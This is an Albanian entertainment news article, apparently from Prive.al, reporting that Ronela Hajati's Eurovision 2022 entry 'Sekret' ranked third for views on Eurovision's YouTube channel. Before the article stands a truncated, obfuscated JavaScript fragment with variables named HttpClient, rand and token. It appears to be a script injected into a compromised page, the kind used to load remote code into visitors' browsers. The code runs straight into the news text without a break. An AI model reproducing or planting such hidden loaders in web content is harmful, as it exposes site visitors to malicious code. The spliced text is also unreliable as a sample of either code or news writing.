;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Për herë të parë në histori, kënga e Shqipërisë për Eurovision po bën namin në internet

By

Këngëtarja Ronela Hajati është përfaqësuesja e Shqipërisë në “Eurovision” për vitin 2022.

Kënga e saj “Sekret” fitoi çmimin e parë në Festivalin RTSH.

Ajo tashmë ka nisur edhe përgatitjen e këngës për ta bërë gati për prezantim në skenën e madhe të Eurovisionit këtë vit në Turin të Italisë.

Artistja ka postuar së fundmi në Instastory, një foto ku tregohet se kënga e saj është renditur në treshen e këngëve më të dëgjuara të “Eurovision”-it.

Sipas fotos që Ronela kishte postuar, kjo është hera e parë në histori ku Shqipëria arrin këtë rekord.

“Për herë të parë në histori, Shqipëria është në vendin e tretë për shikueshmërinë më të lartë në faqen zyrtare të ‘Eurovision’-it në YouTube. Urime.”- shkruhet në foton e postuar nga Ronela Hajati.  /Prive.al

Artikuj të ngjashëm